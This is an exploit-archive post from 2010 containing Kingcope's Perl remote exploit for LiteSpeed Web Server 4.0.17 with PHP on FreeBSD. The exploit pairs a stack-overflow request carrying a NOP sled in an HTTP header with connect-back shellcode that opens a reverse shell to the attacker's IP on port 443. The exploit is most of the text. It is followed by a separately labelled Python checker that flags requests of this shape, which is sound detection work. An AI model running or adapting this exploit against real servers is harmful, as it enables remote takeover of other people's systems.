
[remote exploits] - LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit

Posted on 10 December 2010

=================================================
LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit
=================================================

# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
# can be used against the admin interface (port 7080), too
# Xploit only works on default lsphp binary not the compiled version
#
# this should be exploitable on linux too (on the compiled SAPI version)
# the shipped linux version of lsphp has stack cookies enabled,
# which could be brute forced if there wasn't a null put at the end of
# the exploit buffer. The compiled SAPI version is exploitable, but then
# the offsets differ from box to box, so this time FreeBSD targets only.
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240 (http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;
$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
"\x41\x41\x41\x41\x66\x68\x01\xbb".   # 0x41414141 = callback IP placeholder (patched below), 0x01bb = port 443
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80";

sub usage() {
    print "written by kingcope\n";
    print "usage: ".
          "litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>\n".
          "example: ".
          "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php\n";
    exit;
}

if ($#ARGV ne 3) { usage; }

$target = $ARGV[0];
$port   = $ARGV[1];
$cbip   = $ARGV[2];
$file   = $ARGV[3];

# resolve the callback host to its 4 packed address bytes and patch them
# over the 0x41414141 placeholder at offset 37 of the shellcode
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);

#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                                 PeerPort => 8088,
#                                 Proto    => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\nHost: 192.168.2.5\n\n";
#$x = <stdin>;

#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0);  # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD);  # JMP EDX lsphp

my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                 PeerPort => $port,
                                 Proto    => 'tcp');

# overflow buffer: 263 bytes of padding, 6 dwords, saved return address, trailer
$a  = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
# NOP sled followed by the connect-back shellcode, carried in the VVVV header
$sc = "\x90" x 3000 . $bsdcbsc;

# the request string spans several lines on purpose: each line break is a
# header terminator, and the empty line at the end closes the header block
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file? HTTP/1.1
Host: $target
VVVV: $sc
$a
KINGCOPEH4XXU: 

";

while (<$sock>) {
    print;
}

# 1337db.com [2010-12-10]
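Added example, not part of Kingcope's exploit or of LiteSpeed's code: a Python checker that flags raw HTTP requests shaped like the one above (non-printable bytes and a "/../" hop in the request target, a header value carrying a long 0x90 run, a "header" line with no colon). The thresholds and the two sample requests are constructed for illustration and are not LiteSpeed settings or real traffic.

```python
import re

# Assumed thresholds for illustration; tune to the deployment.
MAX_HEADER_VALUE = 1024   # bytes; LSAPI header buffers are far smaller than the 3000-byte sled
MIN_NOP_RUN = 16          # consecutive 0x90 bytes that count as a sled


def inspect_request(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request (empty list if clean)."""
    findings = []
    # Header block ends at the first blank line, whether CRLF or bare LF.
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    request_line, header_lines = lines[0], lines[1:]
    parts = request_line.split(b" ")
    target = parts[1] if len(parts) >= 2 else b""
    if any(c < 0x20 or c > 0x7e for c in target):
        findings.append("non-printable bytes in request target")
    if b"/../" in target:
        findings.append("path traversal sequence in request target")
    for line in header_lines:
        if not line:
            continue
        if b":" not in line:
            findings.append("header line without ':' (%d bytes)" % len(line))
            continue
        name, value = line.split(b":", 1)
        name, value = name.decode(errors="replace"), value.strip()
        if len(value) > MAX_HEADER_VALUE:
            findings.append("oversized header %s (%d bytes)" % (name, len(value)))
        if re.search(rb"\x90{%d,}" % MIN_NOP_RUN, value):
            findings.append("NOP sled in header %s" % name)
    return findings


# Constructed samples: a plain POST, and a request with the exploit's shape
# (NOPs and '/../' in the target, a 3000-byte NOP header, a colon-less overflow
# line). The second carries no shellcode; it only reproduces the request layout.
BENIGN = b"POST /phpinfo.php HTTP/1.1\r\nHost: example.test\r\nContent-Length: 0\r\n\r\n"
SUSPECT = (b"POST /" + b"\x90" * 6 + b"/../phpinfo.php? HTTP/1.1\nHost: example.test\n"
           + b"VVVV: " + b"\x90" * 3000 + b"\n" + b"A" * 300 + b"\nX: \n\n")
```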
